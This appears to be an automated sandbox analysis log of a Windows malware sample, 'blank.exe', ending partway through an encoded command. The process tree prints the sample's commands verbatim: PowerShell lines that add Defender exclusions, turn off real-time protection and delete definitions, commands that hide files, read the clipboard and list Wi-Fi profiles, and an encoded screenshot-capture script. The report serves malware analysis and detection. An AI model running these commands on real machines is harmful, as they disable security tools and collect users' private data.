Token: SeSystemProfilePrivilege	4556	WMIC.exe
Token: SeSystemtimePrivilege	4556	WMIC.exe
Token: SeProfSingleProcessPrivilege	4556	WMIC.exe
Token: SeIncBasePriorityPrivilege	4556	WMIC.exe
Token: SeCreatePagefilePrivilege	4556	WMIC.exe
Token: SeBackupPrivilege	4556	WMIC.exe
Token: SeRestorePrivilege	4556	WMIC.exe
Token: SeShutdownPrivilege	4556	WMIC.exe
Token: SeDebugPrivilege	4556	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4556	WMIC.exe
Token: SeRemoteShutdownPrivilege	4556	WMIC.exe
Token: SeUndockPrivilege	4556	WMIC.exe
Token: SeManageVolumePrivilege	4556	WMIC.exe
Token: 33	4556	WMIC.exe
Token: 34	4556	WMIC.exe
Token: 35	4556	WMIC.exe
Token: 36	4556	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4556	WMIC.exe
Token: SeSecurityPrivilege	4556	WMIC.exe
Token: SeTakeOwnershipPrivilege	4556	WMIC.exe
Token: SeLoadDriverPrivilege	4556	WMIC.exe
Token: SeSystemProfilePrivilege	4556	WMIC.exe
Token: SeSystemtimePrivilege	4556	WMIC.exe
Token: SeProfSingleProcessPrivilege	4556	WMIC.exe
Token: SeIncBasePriorityPrivilege	4556	WMIC.exe
Token: SeCreatePagefilePrivilege	4556	WMIC.exe
Token: SeBackupPrivilege	4556	WMIC.exe
Token: SeRestorePrivilege	4556	WMIC.exe
Token: SeShutdownPrivilege	4556	WMIC.exe
Token: SeDebugPrivilege	4556	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4556	WMIC.exe
Token: SeRemoteShutdownPrivilege	4556	WMIC.exe
Token: SeUndockPrivilege	4556	WMIC.exe
Token: SeManageVolumePrivilege	4556	WMIC.exe
Token: 33	4556	WMIC.exe
Token: 34	4556	WMIC.exe
Token: 35	4556	WMIC.exe
Token: 36	4556	WMIC.exe
Token: SeDebugPrivilege	2660	taskmgr.exe
Token: SeSystemProfilePrivilege	2660	taskmgr.exe
Token: SeCreateGlobalPrivilege	2660	taskmgr.exe
Token: SeIncreaseQuotaPrivilege	1556	WMIC.exe
Token: SeSecurityPrivilege	1556	WMIC.exe
Token: SeTakeOwnershipPrivilege	1556	WMIC.exe
Token: SeLoadDriverPrivilege	1556	WMIC.exe
Token: SeSystemProfilePrivilege	1556	WMIC.exe
Token: SeSystemtimePrivilege	1556	WMIC.exe
Token: SeProfSingleProcessPrivilege	1556	WMIC.exe
Token: SeIncBasePriorityPrivilege	1556	WMIC.exe
Token: SeCreatePagefilePrivilege	1556	WMIC.exe
Token: SeBackupPrivilege	1556	WMIC.exe
Token: SeRestorePrivilege	1556	WMIC.exe
Token: SeShutdownPrivilege	1556	WMIC.exe
Token: SeDebugPrivilege	1556	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1556	WMIC.exe
Token: SeRemoteShutdownPrivilege	1556	WMIC.exe
Token: SeUndockPrivilege	1556	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe
2660	taskmgr.exe

Suspicious use of SetWindowsHookEx 26 IoCs

pid	Process
4032	OpenWith.exe
4032	OpenWith.exe
4032	OpenWith.exe
4032	OpenWith.exe
4032	OpenWith.exe
4032	OpenWith.exe
4032	OpenWith.exe
4032	OpenWith.exe
4032	OpenWith.exe
4032	OpenWith.exe
4032	OpenWith.exe
4032	OpenWith.exe
4032	OpenWith.exe
4032	OpenWith.exe
4032	OpenWith.exe
4032	OpenWith.exe
4032	OpenWith.exe
4032	OpenWith.exe
4032	OpenWith.exe
4032	OpenWith.exe
4032	OpenWith.exe
4032	OpenWith.exe
4032	OpenWith.exe
2664	msedge.exe
5480	msedge.exe
5480	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 428 wrote to memory of 5080	428	blank.exe	84
PID 428 wrote to memory of 5080	428	blank.exe	84
PID 5080 wrote to memory of 3400	5080	blank.exe	86
PID 5080 wrote to memory of 3400	5080	blank.exe	86
PID 5080 wrote to memory of 2908	5080	blank.exe	87
PID 5080 wrote to memory of 2908	5080	blank.exe	87
PID 5080 wrote to memory of 1288	5080	blank.exe	90
PID 5080 wrote to memory of 1288	5080	blank.exe	90
PID 1288 wrote to memory of 3632	1288	cmd.exe	92
PID 1288 wrote to memory of 3632	1288	cmd.exe	92
PID 2908 wrote to memory of 2780	2908	cmd.exe	93
PID 2908 wrote to memory of 2780	2908	cmd.exe	93
PID 3400 wrote to memory of 4780	3400	cmd.exe	94
PID 3400 wrote to memory of 4780	3400	cmd.exe	94
PID 5080 wrote to memory of 1996	5080	blank.exe	95
PID 5080 wrote to memory of 1996	5080	blank.exe	95
PID 1996 wrote to memory of 4556	1996	cmd.exe	98
PID 1996 wrote to memory of 4556	1996	cmd.exe	98
PID 5080 wrote to memory of 2504	5080	blank.exe	100
PID 5080 wrote to memory of 2504	5080	blank.exe	100
PID 2504 wrote to memory of 2584	2504	cmd.exe	102
PID 2504 wrote to memory of 2584	2504	cmd.exe	102
PID 5080 wrote to memory of 4736	5080	blank.exe	143
PID 5080 wrote to memory of 4736	5080	blank.exe	143
PID 4736 wrote to memory of 4036	4736	cmd.exe	195
PID 4736 wrote to memory of 4036	4736	cmd.exe	195
PID 5080 wrote to memory of 1920	5080	blank.exe	106
PID 5080 wrote to memory of 1920	5080	blank.exe	106
PID 1920 wrote to memory of 1556	1920	cmd.exe	108
PID 1920 wrote to memory of 1556	1920	cmd.exe	108
PID 5080 wrote to memory of 1492	5080	blank.exe	109
PID 5080 wrote to memory of 1492	5080	blank.exe	109
PID 1492 wrote to memory of 1940	1492	cmd.exe	111
PID 1492 wrote to memory of 1940	1492	cmd.exe	111
PID 5080 wrote to memory of 1852	5080	blank.exe	112
PID 5080 wrote to memory of 1852	5080	blank.exe	112
PID 5080 wrote to memory of 1444	5080	blank.exe	113
PID 5080 wrote to memory of 1444	5080	blank.exe	113
PID 1852 wrote to memory of 772	1852	cmd.exe	116
PID 1852 wrote to memory of 772	1852	cmd.exe	116
PID 1444 wrote to memory of 2056	1444	cmd.exe	117
PID 1444 wrote to memory of 2056	1444	cmd.exe	117
PID 5080 wrote to memory of 5084	5080	blank.exe	118
PID 5080 wrote to memory of 5084	5080	blank.exe	118
PID 5080 wrote to memory of 4632	5080	blank.exe	119
PID 5080 wrote to memory of 4632	5080	blank.exe	119
PID 5080 wrote to memory of 5076	5080	blank.exe	122
PID 5080 wrote to memory of 5076	5080	blank.exe	122
PID 5080 wrote to memory of 2256	5080	blank.exe	123
PID 5080 wrote to memory of 2256	5080	blank.exe	123
PID 5080 wrote to memory of 3736	5080	blank.exe	125
PID 5080 wrote to memory of 3736	5080	blank.exe	125
PID 5084 wrote to memory of 3908	5084	cmd.exe	128
PID 5084 wrote to memory of 3908	5084	cmd.exe	128
PID 4632 wrote to memory of 4136	4632	cmd.exe	129
PID 4632 wrote to memory of 4136	4632	cmd.exe	129
PID 5080 wrote to memory of 3364	5080	blank.exe	179
PID 5080 wrote to memory of 3364	5080	blank.exe	179
PID 5080 wrote to memory of 4964	5080	blank.exe	131
PID 5080 wrote to memory of 4964	5080	blank.exe	131
PID 5080 wrote to memory of 1648	5080	blank.exe	132
PID 5080 wrote to memory of 1648	5080	blank.exe	132
PID 5080 wrote to memory of 3716	5080	blank.exe	135
PID 5080 wrote to memory of 3716	5080	blank.exe	135

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
772	attrib.exe
564	attrib.exe
376	attrib.exe

C:\Users\Admin\AppData\Local\Temp\blank.exe
"C:\Users\Admin\AppData\Local\Temp\blank.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:428
- C:\Users\Admin\AppData\Local\Temp\blank.exe
  "C:\Users\Admin\AppData\Local\Temp\blank.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:5080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\blank.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3400
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\blank.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2908
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1288
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1996
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2504
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4736
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1920
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:1556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1492
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\blank.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1852
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\blank.exe"
      4⤵
      Views/modifies file attributes
      PID:772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1444
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5084
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4632
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:5076
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:2256
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:1840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3736
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3364
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4964
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1648
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3716
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:2896
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQA